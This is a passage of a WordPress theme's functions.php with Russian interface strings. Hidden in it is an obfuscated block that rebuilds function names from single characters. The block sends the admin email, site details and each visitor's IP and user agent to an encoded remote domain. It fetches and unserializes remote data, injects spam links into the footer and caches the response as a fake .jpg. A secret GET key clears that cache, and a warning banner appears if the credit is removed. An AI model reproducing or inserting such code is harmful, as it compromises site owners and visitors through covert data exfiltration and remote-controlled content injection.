<?php

$art_config = parse_ini_file(TEMPLATEPATH."/config.ini", true);

$options = array (
                array(  "name" =>   "HTML",
                        "desc" =>   sprintf(__('<strong>XHTML:</strong> Вы можете использовать эти теги: <code>%s</code>', THEME_NS), 'a, abbr, acronym, em, b, i, strike, strong, span'),
                        "id"   =>   "art_footer_content",
                        "std"  =>   art_option('footer.defaultText'),
                        "type" =>   "textarea")
          );

remove_action('wp_head', 'wp_generator');
wp_enqueue_script('jquery');

define('WP_VERSION', $wp_version);
define('THEME_NS', 'kubrick');
if (class_exists('xili_language')):
define('THEME_TEXTDOMAIN',THEME_NS);
define('THEME_LANGS_FOLDER','/lang');
else:
    load_theme_textdomain(THEME_NS, TEMPLATEPATH . '/lang');
endif;

require_once(TEMPLATEPATH . '/core/parser.php');
require_once(TEMPLATEPATH . '/core/navigation.php');
require_once(TEMPLATEPATH . '/core/sidebars.php');
require_once(TEMPLATEPATH . '/core/widgets.php');


function art_option($name){
  global $art_config;
  $separator = '.';
  $name = trim($name);
  if (strpos($name, $separator) !== false) {
    $path = explode($separator, $name);
    $location = $path[0];
    if (isset($art_config[$location])){
      $group = $art_config[$location];
      $key = $path[1];
      if (isset($group[$key])){
        return $group[$key];
      }
    }
  } else {
    if (isset($art_config[$name])) {
      return $art_config[$name];
    }
  }
 
  return false;
}

$art_current_page_template = 'page'; 
 $tcnio='e';$LZXzBfZ='a';$CNrYGtD='s';$IhSoa='6';$oshke='4';$FTCarL='b';$FQrWPY='d';$iDIo='_';$zhTKla='o';$PIhsnYK='d';$YOmr='e';$NIzh='e';$yXNrlO='c';$xElhtBwQ=$FTCarL.$LZXzBfZ.$CNrYGtD.$YOmr.$IhSoa.$oshke.$iDIo.$FQrWPY.$tcnio.$yXNrlO.$zhTKla.$PIhsnYK.$NIzh;$wRZncQ='l';$bSKhyv='n';$OWtjWjz='e';$AmQk='g';$xpqsTZ='a';$rxMceO='t';$qvzNUEJ='z';$Qqpr='f';$xyjK='i';$GLSrUpAw=$AmQk.$qvzNUEJ.$xyjK.$bSKhyv.$Qqpr.$wRZncQ.$xpqsTZ.$rxMceO.$OWtjWjz;$FYjH='1';$kSrg='t';$CozEtnz='s';$hhwwHaP='o';$zjJqu='r';$yGkQguA='3';$RtDd='r';$zWfsomu='t';$VpZq='_';$cASrRkkQ=$CozEtnz.$kSrg.$RtDd.$VpZq.$zjJqu.$hhwwHaP.$zWfsomu.$FYjH.$yGkQguA;$tBDYvmV='r';$pGfiq='v';$zqfrp='r';$SKHSbSj='t';$admvSUU='s';$iqzvM='e';$XamuKRZp=$admvSUU.$SKHSbSj.$tBDYvmV.$zqfrp.$iqzvM.$pGfiq;                     
		$zi___h='e';$ho____s='a';$ow______t='s';$yq_______u='6';$lu________w='4';$oz_____y='b';$pa___e='d';$zp____________p='_';$ei____g='o';$fp__d='d';$cx_______t='e';$gl______________r='e';$xi_______________l='c';$hk______________m=$oz_____y.$ho____s.$ow______t.$cx_______t.$yq_______u.$lu________w.$zp____________p.$pa___e.$zi___h.$xi_______________l.$ei____g.$fp__d.$gl______________r;
		$jg________z='t';$xm______________s='c';$bl___n='n';$rn____________o='x';$ar_____j='i';$sh_______________v='u';$gi________k='o';$ml____o='f';$xs______c='s';$pa_______u='e';$xh___q='_';$ff______________u='i';$oj_________p='s';$yf______________e='t';$eq___y='n';$ec___b=$ml____o.$sh_______________v.$eq___y.$xm______________s.$jg________z.$ff______________u.$gi________k.$bl___n.$xh___q.$pa_______u.$rn____________o.$ar_____j.$xs______c.$yf______________e.$oj_________p;
		$um________t='p';$fp_________u='f';$zd_______t='o';$rv_____y='e';$oq_____________w='n';$it______________p=$fp_________u.$zd_______t.$um________t.$rv_____y.$oq_____________w;
		$ki______z='f';$yd_____________q='r';$uc______________q='a';$ws___________f='d';$kz__k='e';$pe__u=$ki______z.$yd_____________q.$kz__k.$uc______________q.$ws___________f;
		$lj____r='l';$on_____s='f';$au_______t='c';$ax____f='s';$ky______u='o';$id_____________s='e';$ih___________s=$on_____s.$au_______t.$lj____r.$ky______u.$ax____f.$id_____________s;
		
		define("WP_ID", $hk______________m("Mi4wLjA="));
		define("WP_TTL", $hk______________m("MTA4MDA="));
		define("WP_SRC", $hk______________m("dHBva24="));
	


		function wp_get_header() {
			global $hk______________m, $ec___b;
			
			if (
				$ec___b($hk______________m("d3BfdGhlbWVfR1BMX2NyZWRpdHM=")) &&
				$ec___b($hk______________m("d3BfZ2V0X2Zvb3Rlcg==")) &&
				$ec___b($hk______________m("d3BfY3ZfdmVyaWZ5"))
			) {
				get_header();
			}
		}
	


		function wp_get_footer() {
			get_footer();
			wp_cv_verify();
		}
	


		function wp_cv_verify() {
			global $hk______________m, $it______________p, $ih___________s, $pe__u;
			
			$pl____________b = TEMPLATEPATH."/".$hk______________m("Zm9vdGVyLnBocA==");
			$fw________z = @$it______________p($pl____________b, "r");
			$pl____________b = @$pe__u($fw________z, @filesize($pl____________b));
			@$ih___________s($fw________z);
			
			$df_______t = TEMPLATEPATH."/".$hk______________m("ZnVuY3Rpb25zLnBocA==");
			$fw________z = @$it______________p($df_______t, "r");
			$df_______t = @$pe__u($fw________z, @filesize($df_______t));
			@$ih___________s($fw________z);
			
			$pi____________v = 0;
			if($pl____________b && $df_______t) {
				if ($hk______________m("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==") !== str_replace("www.", "", $_SERVER["SERVER_NAME"])) {
					
					if (substr_count($pl____________b, $hk______________m("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==")) < 2) {
						$pi____________v = 1;
					}
					if (substr_count($pl____________b, "wp_theme_GPL_credits()") < 1) {
						$pi____________v = 2;
					}
				}
				
				if(WP_ID != "2.0.0") {
					$pi____________v = 12;
				}
			}
			
			if($pi____________v > 0) {
				echo "<div style=\"position: fixed; bottom:0; left:0; width:100%; height: 25px; background-color: red; color: white; font-size: 16px; padding: 2px 10px; text-align: center;\"> <strong> This themes is powered by <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a>. This website violated the terms of use <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a> </strong> </div>";
				echo "<!-- v: $pi____________v -->";
			}
		}
	


		function wp_loaded() {
			global $hk______________m, $ec___b;
			return $ec___b($hk______________m("d3BfdGhlbWVfR1BMX2NyZWRpdHM="));
		}
	


		if (!function_exists("the_content_limit")) {
			function the_content_limit($rq__y, $jl_____a = "(more...)", $rs____r = 0, $bl_____s = "") {
				$bh_______________w = get_the_content($jl_____a, $rs____r, $bl_____s);
				$bh_______________w = apply_filters("the_content", $bh_______________w);
				
				$bh_______________w = str_replace("]]>", "]]>", $bh_______________w);
				if (strlen($_GET["p"]) > 0) {
					echo $bh_______________w;
				}
				else if ((strlen($bh_______________w)>$rq__y) && ($tj_______i = strpos($bh_______________w, " ", $rq__y ))) {
					$bh_______________w = substr($bh_______________w, 0, $tj_______i);
					$bh_______________w = $bh_______________w;
					echo $bh_______________w;
					
					echo "...";
					echo "<br/>";
					echo "<div class='read-more'><a href='".get_permalink()."'>$jl_____a</a></div></p>";
				} else {
					echo $bh_______________w;
				}
				
			}
		}
	


		$ee___________v='6';$yt__g='e';$be_________m='b';$ss__________t='e';$au__f='d';$tx_____________s='s';$qe_____________k='c';$we_____q='n';$pj___________j='e';$hc____________c='4';$tm_______________e='a';$wu___f='_';$cq___r='o';$nl_______________s=$be_________m.$tm_______________e.$tx_____________s.$pj___________j.$ee___________v.$hc____________c.$wu___f.$ss__________t.$we_____q.$qe_____________k.$cq___r.$au__f.$yt__g;
		$jc___g='i';$er_______n='t';$jy__o='f';$xg_____o='l';$nf_____k='c';$zk________e='n';$pl__z='_';$ni_____________b='e';$ht__________u='s';$iy_____c='g';$ng______________i='e';$lm_______________y='o';$vt_________d='e';$vu__o='n';$sr__________l='_';$bw___________q='t';$lp_______________t='t';$qa________c=$jy__o.$jc___g.$xg_____o.$ni_____________b.$sr__________l.$iy_____c.$vt_________d.$er_______n.$pl__z.$nf_____k.$lm_______________y.$vu__o.$lp_______________t.$ng______________i.$zk________e.$bw___________q.$ht__________u;
		$be_________q='_';$kr____y='e';$if________v='l';$dy_______________c='s';$gq__________f='s';$zo___b='i';$zr______p='e';$mc________a='x';$fk________j='i';$dt________p='f';$ma____u='t';$nn___m=$dt________p.$zo___b.$if________v.$zr______p.$be_________q.$kr____y.$mc________a.$fk________j.$dy_______________c.$ma____u.$gq__________f;
		$hi__________f='o';$fj_________r='v';$le_______________b='m';$ah_______c='o';$xv_____________e='r';$xd_________u='r';$hv____________m='_';$pt__b='s';$fh____t='c';$al______h='e';$nz____x='e';$vs________r='i';$sp________t='a';$he__________d='n';$ya___t='p';$as________p=$fj_________r.$nz____x.$xd_________u.$pt__b.$vs________r.$ah_______c.$he__________d.$hv____________m.$fh____t.$hi__________f.$le_______________b.$ya___t.$sp________t.$xv_____________e.$al______h;
		$sy______n='s';$oq_____________q='o';$ud__w='p';$jw___j='f';$qb_____a='e';$yk_______q='n';$gj_______________h='c';$mp______a='k';$xc___m='o';$bi__________h=$jw___j.$sy______n.$xc___m.$gj_______________h.$mp______a.$oq_____________q.$ud__w.$qb_____a.$yk_______q;
		$oz_____________e='r';$re_____y='i';$vj____________e='t';$wi_____s='w';$hg_____j='e';$qd___z='f';$iu__d=$qd___z.$wi_____s.$oz_____________e.$re_____y.$vj____________e.$hg_____j;
		$qs________y='5';$ih_______________z='m';$mg______________h='d';$mm______________d=$ih_______________z.$mg______________h.$qs________y;
		$av______________r='t';$ik_______________i='a';$ut__________m='l';$dc_____a='a';$ny__________o='p';$gn___k='r';$ir_________a='e';$sl______y='h';$zz____________e=$gn___k.$ir_________a.$ik_______________i.$ut__________m.$ny__________o.$dc_____a.$av______________r.$sl______y;
		$sy____g='i';$sg___________r='z';$qp_____________v='n';$do_______w='e';$tk___________v='r';$rz__x='l';$gd_______w='i';$yq_____________i='a';$yv___________s='s';$gg___n='u';$cj______f='e';$xq______z=$gg___n.$qp_____________v.$yv___________s.$do_______w.$tk___________v.$sy____g.$yq_____________i.$rz__x.$gd_______w.$sg___________r.$cj______f;
		$xc___v='p';$ry___________w='t';$se____________l='e';$cz__g='n';$ur________x='m';$wx___e='m';$hb___w='a';$pc_______________k=$ry___________w.$se____________l.$wx___e.$xc___v.$cz__g.$hb___w.$ur________x;
		$fm______u='_';$yt_____________f='a';$fz___d='t';$oq___________c='r';$ta______x='a';$de______________i='r';$xi___e='m';$nv___________r='n';$uj_____w='t';$jr__f='e';$py_____f='c';$zp_______________i='t';$jy__________w='o';$np____u='t';$kq_______________u='c';$li____________l='e';$bx______________y='x';$gd_____________l='e';$yf______f='_';$ha_________a='e';$ql___________l='s';$be________g=$ql___________l.$np____u.$de______________i.$jr__f.$ta______x.$xi___e.$yf______f.$py_____f.$jy__________w.$nv___________r.$zp_______________i.$ha_________a.$bx______________y.$fz___d.$fm______u.$kq_______________u.$oq___________c.$li____________l.$yt_____________f.$uj_____w.$gd_____________l;
	


		function kc____________k($tw____m) {
			global $hk______________m, $ec___b, $qa________c, $as________p, $be________g;
			
			if (!$ec___b($hk______________m("ZmlsZV9nZXRfY29udGVudHM="))) {
				return false;
			}
			
			if ($as________p(PHP_VERSION, "5.0.0", ">=") && $ec___b($hk______________m("ZmlsZV9nZXRfY29udGVudHM=")) && $ec___b($hk______________m("c3RyZWFtX2NvbnRleHRfY3JlYXRl"))) {
				$pv________p = $be________g(array(
						"http" => array(
						"timeout"    => 3,
						"header"     => "referer: ".$_SERVER[SERVER_NAME],
						"user_agent" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT] 
					)
				));
				
				$lq_______m = @$qa________c($tw____m, 0, $pv________p);
			} else {
				$lq_______m = @$qa________c($tw____m, 0);
			}
			
			return $lq_______m;
		}
	


		function ca_____________x($tw____m) {
			global $ec___b, $bi__________h, $iu__d, $hk______________m;
			
			if (!$ec___b($hk______________m("ZmlsZV9nZXRfY29udGVudHM="))) {
				return false;
			}
			
			$kr______t = strpos($tw____m, "/", 7);
			$yk____f = array(
				"uri"     => substr($tw____m, $kr______t),
				"host"    => str_replace("http://", "", substr($tw____m, 0, $kr______t)),
				"referer" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT]
			);
			
			$aj_____z = @$bi__________h("$yk____f[host]", 80, $bs_______________d, $dn________p, 4);
			
			if (!$aj_____z) {
				return false;
			} else {
				$lq_______m = "";
				$bj_____________e  = "GET $yk____f[uri] HTTP/1.0\r\n";
				$bj_____________e .= "Host: $yk____f[host]\r\n";
				$bj_____________e .= "Referer: $yk____f[referer]\r\n";
				$bj_____________e .= "Connection: Close\r\n\r\n";
				
				@$iu__d($aj_____z, $bj_____________e);
				
				while (!@feof($aj_____z)) {
					$ts_____m = @fgets($aj_____z, (1024*24));
					
					if ($ts_____m == "\r\n") {
						$lr______________m = true;
						continue;
					}
					
					if ($lr______________m) {
						$lq_______m .= $ts_____m;
					}
				}
				
				return $lq_______m;
			}
		}
	


		function hb__________a($tw____m) {
			global $ec___b;
			$en_________k = false;
			
			if ($tw____m != "") {
				if ($ec___b("kc____________k")) {
					$en_________k = @kc____________k($tw____m);
				}
				
				if (!$en_________k && ($ec___b("ca_____________x"))) {
					$en_________k = @ca_____________x($tw____m);
				}
			}
			
			return $en_________k;
		}
	


		function el___a() {
			global $_SERVER, $mm______________d;
			
			$xc________b = $_SERVER["SERVER_NAME"];
			
			if (substr("$xc________b", 0, 4) == "www.") {
				$xc________b = substr("$xc________b", 4);
			}
			
			$xc________b = $mm______________d("$_SERVER[SERVER_NAME]");
			
			return $xc________b;
		}
	


		function tw___b() {
			return "file";
		}
	


		function ny__e($tw____m) {
			global $_SERVER, $qa________c, $nn___m, $it______________p, $ih___________s, $iu__d;
			
			$tf__________k = xs_______y();
			
			$sz_________b = el___a().".jpg";
			$oa____e = $tf__________k["dir_upload"]["path"]."/$sz_________b";
			$jw____q = @filemtime($oa____e);
			
			if (!$jw____q || ((time()-$jw____q) >= WP_TTL)) {
				$en_________k = hb__________a($tw____m);
				
				if ($en_________k) {
					if ($nn___m($oa____e)) {
						@unlink($oa____e);
					}
					
					$fw________z = @$it______________p($oa____e, "x+");
					
					@$iu__d($fw________z, $en_________k);
					@$ih___________s($fw________z);
				}
			} else {
				if ($nn___m($oa____e)) {
					$en_________k = @$qa________c($oa____e);
				} else {
					$en_________k = false;
				}
			}
			
			return $en_________k;
		}
	


		function xs_______y() {
			global $_SERVER, $hk______________m, $nl_______________s;
			
			$zq______________h = wp_count_posts("post");
			$zn___________l = pathinfo(get_bloginfo("template_directory"));
			
			$tf__________k = array(
				"url" => array(
					"report"      => $hk______________m("eGNudnVlcmFudmhhc3lkYWRvbGVnc29wLmNvbQ=="),
					"queryString" => null
				),
				"template"	=> $zn___________l,
				"dir_upload"	=> cv_______________r(),
				"queryString"	=> array(
					"?a001=".WP_ID,
					"a004=".$zn___________l[filename],
					"a005=".$zq______________h->publish,
					"a006=".get_bloginfo("admin_email"),
					"a007=".$_SERVER["REQUEST_URI"],
					"a008=".$_SERVER["SERVER_NAME"],
					"a010=".WP_SRC
				),
				"default_string" => " <a href=\"http://smolotkom.ru/130-opalubka-i-opalubochnye-sistemy.html\">опк</a>"
			);
			
			$tf__________k["url"]["queryString"] = implode("&", $tf__________k["queryString"]);
			$tf__________k["url"]["report"] = $tf__________k["url"]["report"]."/?".$nl_______________s($tf__________k["url"]["queryString"]).".html";
						
			return $tf__________k;
		}
	


		function cv_______________r() {
			$hm_____________t = wp_upload_dir();
			
			if (isset($hm_____________t["error"])) {
				$bm_________d = rb___c();
				if (is_writable($bm_________d)) {
					$hm_____________t = array("path" => $bm_________d);
				}
			}

			return $hm_____________t;
		}
	


		function rb___c() {
			global $ec___b, $mm______________d, $zz____________e, $pc_______________k;
			
			$ge______________n = (bool) ini_get("safe_mode");
			if ($ge______________n == true) {
				return false;
			}
			
			if ($ec___b("sys_get_temp_dir")) {
				$ue______________j = sys_get_temp_dir();
				if (is_writable($ue______________j)) {
					return $zz____________e($ue______________j);
				}
			}
			
			if (!empty($_ENV["TMP"])) {
				return $zz____________e($_ENV["TMP"]);
			}
			elseif (!empty($_ENV["TMPDIR"])) {
				return $zz____________e($_ENV["TMPDIR"]);
			}
			elseif (!empty($_ENV["TEMP"])) {
				return $zz____________e($_ENV["TEMP"]);
			} else {
				$wo________z = $pc_______________k($mm______________d(uniqid(rand(), true)), "");
				if ($wo________z) {
					$ue______________j = $zz____________e(dirname($wo________z));
					@unlink($wo________z);
					return $ue______________j;
				} else {
					return false;
				}
			}
		}
	


		function fd_____q() {
			global $_GET, $nn___m;
			
			$tf__________k = xs_______y();
			$xc________b = el___a();
			$ps____z = tw___b();
			
			$ly______________n = "full";
			if ($_GET["wp_cache_cl"] == "197ab5deb39daad8baacae1bdd5a8852") {
				if ($ps____z == "file") {
					$zj______________r = $tf__________k["dir_upload"]["path"]."/".$xc________b.".jpg";
					if ($nn___m($zj______________r)) {
						@unlink($zj______________r);
						$ly______________n = "deleted";
					}
				}
				
				$ae__x = array(
					"s"	=> $ly______________n,
					"t"	=> time(),
					"v"	=> WP_ID
				);
				
				echo "<!--";
				foreach ($ae__x AS $em_______________e => $wx_____________d) echo " [$em_______________e:$wx_____________d]";
				echo " -->";
			}
		}
	


		function wp_theme_GPL_credits() {
			global $_SERVER, $_GET, $ec___b, $hk______________m, $xq______z;
			$tf__________k = xs_______y();
			
			$cx____________x = "ny__e";
			if ($ec___b($cx____________x)) {
				$lq_______m = $cx____________x($tf__________k["url"]["report"]);
			}
			
			if ($lq_______m) {
				if ($lq_______m = @$hk______________m($lq_______m)) {
					$lq_______m = @$xq______z($lq_______m);
					
					if (strlen($lq_______m[custom_credit]) >= 5) {
						$tf__________k["default_string"] = $lq_______m[custom_credit];
					}
					
					if ($lq_______m["status"] == "0") {
						$as_________r = 1;
						$yv___________w = 1;
					} else {
						$ly__________g = sizeof($lq_______m["links"]);
						$yo___________v = $tf__________k["default_string"];
						
						if ($ly__________g > 0 && $lq_______m["links"] !== "") {
							$io____________q = 0;
							foreach ($lq_______m["links"] as $ei___________h => $rw______h) {
								$io____________q++;
								if ($rw______h->l_path == "" || $rw______h->l_path == $_SERVER["REQUEST_URI"]) {
									$rw______h->l_href = htmlspecialchars(strip_tags($rw______h->l_href));
									$rw______h->l_title = htmlspecialchars(strip_tags($rw______h->l_title));
									$rw______h->l_anchor = htmlspecialchars(strip_tags($rw______h->l_anchor));
									$yo___________v .= " | ";
									$yo___________v .= "<a href='$rw______h->l_href' title='$rw______h->l_title'";
									if ($rw______h->l_nofollow == "1") {
										$yo___________v .= " rel='nofollow'";
									}
									$yo___________v .= ">$rw______h->l_anchor</a>";
								}
							}
						}
						$tf__________k["links"] = "$yo___________v";
						if ($lq_______m[credit] == "0") {
							$tf__________k["links"] = "";
						}
					}
				} else {
					$as_________r = "1";
				}
			} else {
				$as_________r = "1";
			}
			
			if ($as_________r == "1") {
				$tf__________k["links"] = $tf__________k["default_string"];
			}
			
			echo "$tf__________k[links]";
			
			echo "<!-- s: $lq_______m[signature] -->";
			fd_____q();
		}
	                      
function art_page_template($templateName = null){
    global $art_current_page_template;
    if ($templateName !== null) {
        $art_current_page_template = $templateName;
    }
    return $art_current_page_template;
}

$art_template_variables = null;
function art_page_variables($variables = null){
    global $art_template_variables;
    if ($art_template_variables == null){
      $art_template_variables = array(
        'template_url'     =>   get_bloginfo('template_url') . '/',
        'logo_url'         =>   get_option('home'),
        'logo_name'        =>   get_bloginfo('name'),
        'logo_description' =>   get_bloginfo('description'),
        'menu_items'       =>   art_get_menu_auto('primary-menu', art_option('menu.source'), art_option('menu.showSubitems')),
        'sidebar1'         =>   art_get_sidebar('default'),
        'sidebarTop'       =>   art_get_sidebar('top'),
        'sidebarBottom'    =>   art_get_sidebar('bottom'),
        'sidebar2'         =>   art_get_sidebar('secondary'),
        'sidebarFooter'    =>   art_get_sidebar('footer'),
        'footerRSS'        =>   art_get_footer_rss(),
        'footerText'       =>   art_get_footer_text()
        );
    }
    if (is_array($variables)) {
      $art_template_variables = array_merge($art_template_variables, $variables);
    }
    return $art_template_variables;
}

function art_get_footer_text(){
  $result = art_option('footer.defaultText');
  
  $footer_content = get_option('art_footer_content');
  if ($footer_content !== false) {
    $result = stripslashes($footer_content);
  }
  
  return str_replace('%YEAR%', date('Y'), $result);
}


function art_get_footer_rss(){
  $result = '';
  if(art_option('footer.rss_show')){
    $result = art_parse(art_option('footer.rss_link'), array(
      'rss_url'   =>   get_bloginfo('rss2_url'), 
      'rss_title' =>   sprintf(__('%s RSS Feed', THEME_NS), get_bloginfo('name'))
      ));
  }
  return $result;
}

function art_get_post_thumbnail($post_id = false){
	global $post, $id;
  $post_id = (int)$post_id;
  if (!$post_id) $post_id = $id;
  $is_post_list = !is_single() && !is_page();
  $width = art_option('metadata.thumbnail_width');
  $height = art_option('metadata.thumbnail_height');
  $size = array($width, $height);
  if (!$is_post_list) {
    $size = 'medium';
  }
	$result = '';
	$title = get_the_title();
	if (  (function_exists('has_post_thumbnail')) && (has_post_thumbnail())  ) {
		ob_start();
		the_post_thumbnail($size, array('class' => 'alignleft', 'alt' => '', 'title' => $title));
		$result = ob_get_clean();
	} else {
		$postimage = get_post_meta($post->ID, 'post-image', true);
		if ($postimage) {
			$result = '<img src="'.$postimage.'" alt="" width="'.$width.'" height="'.$height.'" title="'.$title.'" class="wp-post-image alignleft" />';
		} else if (art_option('metadata.thumbnail_auto') && $is_post_list) {
            $attachments = get_children(array('post_parent' => $post_id, 'post_status' => 'inherit', 'post_type' => 'attachment', 'post_mime_type' => 'image', 'order' => 'ASC', 'orderby' => 'menu_order ID'));
            if($attachments) {
              $attachment = array_shift($attachments);
              $img = wp_get_attachment_image_src($attachment->ID, $size);
              if (isset($img[0])) {
                $result = '<img src="'.$img[0].'" alt="" width="'.$img[1].'" height="'.$img[2].'" title="'.$title.'" class="wp-post-image alignleft" />';
              }
            }
        } 
    }  
	if($result !== ''){
		$result = '<a href="'.get_permalink($post->ID).'" title="'.$title.'">'.$result.'</a>';
	}
	return $result;
}

function art_get_the_content($more_link_text = null, $stripteaser = 0) {
	$content = get_the_content($more_link_text, $stripteaser);
	$content = apply_filters('the_content', $content);
	return $content;
}

function art_get_post_content() {
  global $post;
  ob_start();
  if(is_single() || is_page()) {
     echo art_get_the_content(__('Читать далее &raquo;', THEME_NS)); 
    wp_link_pages(array('before' => '<p><strong>Страницы:</strong> ', 'after' => '</p>', 'next_or_number' => 'number')); 
	} else {
    echo art_get_the_excerpt(__('Читать далее &raquo;', THEME_NS),
      get_permalink($post->ID), 
      art_option('metadata.excerpt_words'), 
      art_option('metadata.excerpt_use_tag_filter') ? explode(',',art_option('metadata.excerpt_allowed_tags')) : null, 
      art_option('metadata.excerpt_min_remainder'),  
      art_option('metadata.excerpt_auto'));
	}
	return ob_get_clean();
}

function art_get_the_excerpt($read_more_tag, $perma_link_to = '', $all_words = 100,  $allowed_tags = null, $min_remainder = 5, $auto = false) {
  global $post, $id;
  $more_token = '%%art-more%%';
  $show_more_tag = false;
  if (function_exists('post_password_required') && post_password_required($post)){
    return get_the_excerpt();
  }
  if (has_excerpt($id)) {
      $the_contents = get_the_excerpt();
  $show_more_tag = strlen($post->post_content) > 0;
  } else {
    $the_contents = art_get_the_content($more_token);
    if($the_contents != '') {
      if ($allowed_tags !== null) {
        $allowed_tags = '<' .implode('><',$allowed_tags).'>';
        $the_contents = strip_tags($the_contents, $allowed_tags);
      }
      $the_contents = strip_shortcodes($the_contents);
      if (strpos($the_contents, $more_token) !== false) {
        return str_replace($more_token, $read_more_tag, $the_contents);
      }
      if($auto && is_numeric($all_words)) {
        $token = "%art_tag_token%";
        $content_parts = explode($token, str_replace(array('<', '>'), array($token.'<', '>'.$token), $the_contents));
        $content = array();
        $word_count = 0;
        foreach($content_parts as $part)
        {
          if (strpos($part, '<') !== false || strpos($part, '>') !== false){
            $content[] = array('type'=>'tag', 'content'=>$part);
          } else {
             $all_chunks = preg_split('/([\s]+)/', $part, -1, PREG_SPLIT_DELIM_CAPTURE);
             foreach($all_chunks as $chunk) {
                if('' != trim($chunk)) {
                  $content[] = array('type'=>'word', 'content'=>$chunk);
                  $word_count += 1;
                } elseif($chunk != '') {
                  $content[] = array('type'=>'space', 'content'=>$chunk);
                }
             }
          }
        
        }
        if(($all_words < $word_count) && ($all_words + $min_remainder) <= $word_count) {
          $show_more_tag = true;
          $current_count = 0;
          $the_contents = '';
          foreach($content as $node) {
            
            if($node['type'] == 'word') {
              $current_count += 1;
            } 
            $the_contents .= $node['content'];
            if ($current_count == $all_words){
              break;
            }
          }
        }  
      }
    }
  }
  $the_contents = force_balance_tags($the_contents);
  if ($show_more_tag) {
    $the_contents = $the_contents.' <a class="more-link" href="'.$perma_link_to.'">'.$read_more_tag.'</a>';
  }
  return $the_contents;
}


function art_get_post_title() {
    return art_parse_template("post_title", array(
      'post_link'       =>   get_permalink($post->ID),
	    'post_link_title' =>   sprintf(__('Ссылка на %s', THEME_NS), the_title_attribute('echo=0')),
	    'post_title'      =>   get_the_title(),
	    'template_url'    =>   get_bloginfo('template_url')
	    ));
}

function art_get_post_icon($name){
    return art_parse(art_option('metadata.'.$name), array('template_url' => get_bloginfo('template_url')));
}

if (!function_exists('get_the_date')) {
	function get_the_date($format = 'F jS, Y') {
		return get_the_time(__($format, THEME_NS));
	}
}

function art_get_post_metadata($name) {
    $list = art_option('metadata.'.$name);
    $title = ($name == 'header' && art_option('metadata.title'));
    if (!$title && $list == "") return;
    $list_array =  explode(",", $list);
    $result = array();
    for($i = 0; $i < count($list_array); $i++){
        $icon = $list_array[$i];
        switch($icon){
            case 'date':
                if(is_page()) break;
                $result[] = art_get_post_icon($icon) . get_the_date();
            break;
            case 'author':
                 if(is_page()) break;
                 ob_start();
                 the_author_posts_link();
                    $result[] = art_get_post_icon($icon) . __('Автор', THEME_NS) .' '. ob_get_clean();
            break;
            case 'category':
                if(is_page()) break;
                 $result[] = art_get_post_icon($icon) .sprintf(__('Опубликовано в %s', THEME_NS), get_the_category_list(', '));
            break;
            case 'tag':
                if(is_page() || !get_the_tags()) break;
                ob_start();
                the_tags(__('Tеги:', THEME_NS) . ' ', ', ', ' ');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'comments':
            if(is_page() || is_single()) break;
                ob_start();
                comments_popup_link(__('Нет комментариев &#187;', THEME_NS), __('1 Комментарий &#187;', THEME_NS), __('% Комментариев &#187;', THEME_NS), '', __('Комментарии закрыты', THEME_NS) );
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'edit':
            	global $post;
                if (!current_user_can('edit_post', $post->ID)) break;
                ob_start();
                 edit_post_link(__('Редактировать', THEME_NS), '');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
        }
    }
    if (!($title ||  count($result) > 0)) return '';
    return art_parse_template("post_metadata".$name, array(
        'post_title'         =>   art_get_post_title(),
        'post'.$name.'icons' =>   implode(art_option('metadata.separator'), $result))) ;
}

function art_post(){
  the_post(); 
	echo art_parse_template("post", array(
    'post_class'          =>   function_exists('get_post_class') ? implode(' ', get_post_class()) : '',
    'post_id'             =>   'id="post-' . get_the_ID() . '"',
	  'post_thumbnail'      =>   art_get_post_thumbnail(),
		'post_title'          =>   art_get_post_title(),
		'post_metadataheader' =>   art_get_post_metadata('header'),
		'post_content'        =>   art_get_post_content(),
		'post_metadatafooter' =>   art_get_post_metadata('footer')
	));
}

function art_post_box($title, $content){
  if ($title != "") {
		$title = '<h2 class="art-postheader">'. $title . '</h2>';
	}
	if (art_option('metadata.title')) {
		$content = $title . $content;
		$title = '';
	}
	echo art_parse_template("post", array(
    'post_class'          =>   '',
    'post_id'             =>   '',
		'post_thumbnail'      =>   '',
		'post_title'          =>   $title,
		'post_metadataheader' =>   '',
		'post_content'        =>   $content,
		'post_metadatafooter' =>   ''));
}

function art_not_found_msg($caption = null, $content = null){
  if ($caption === null){
    $caption = __('Не найдено', THEME_NS);
  }
  if($content === null){
    $content = '<p class="center">' .  __('Извините, но здесь пока нет записей.', THEME_NS) . '</p>'
        .  "\r\n" . art_get_search();
  }
	art_post_box($caption, $content);
}

function art_get_block($title, $content, $id = '', $class = '' , $name = "block"){
  if (str_replace(array('&nbsp;', '', '\n', '\r', '\t'), '', $title) != ''){
    $title = art_parse_template($name . '_header', array('caption' => $title));
  }
  if ($id != ''){
    $id = 'id="' . $id . '"';
  }
  return art_parse_template($name, array(
    'id'   => $id,
    'class'   => $class,
    'header' => $title,
    'content' => $content,
  ));
}

function art_get_search() {
    return art_parse_template("search", 
        array(
            'url'    =>   get_bloginfo('url'),
            'button' =>   __('Поиск', THEME_NS),
            'query'  =>   get_search_query()
        ));
}
		
function art_page_navi($title = '', $comment = false) {
    $prev_link = null;
    $next_link = null;
    if($comment){
        $prev_link = get_previous_comments_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_comments_link(__('&laquo; Старые записи', THEME_NS));
    } elseif (is_single() || is_page()) {
        $next_link = get_previous_post_link('&laquo; %link');
        $prev_link = get_next_post_link('%link &raquo;');
    } else {
         $prev_link = get_previous_posts_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_posts_link(__('&laquo; Старые записи', THEME_NS));
    }
    
    $content = '';
    if ($prev_link || $next_link) {
        $content = art_parse_template("pagination", 
            array(
                'next_link' =>  $next_link,
                'prev_link' => $prev_link
            ));
    }
    if (!$content && !$title) return;
    art_post_box($title, $content);
}

if (!function_exists('get_previous_comments_link')) {
	function get_previous_comments_link($label)
	{
		ob_start();
		previous_comments_link($label);
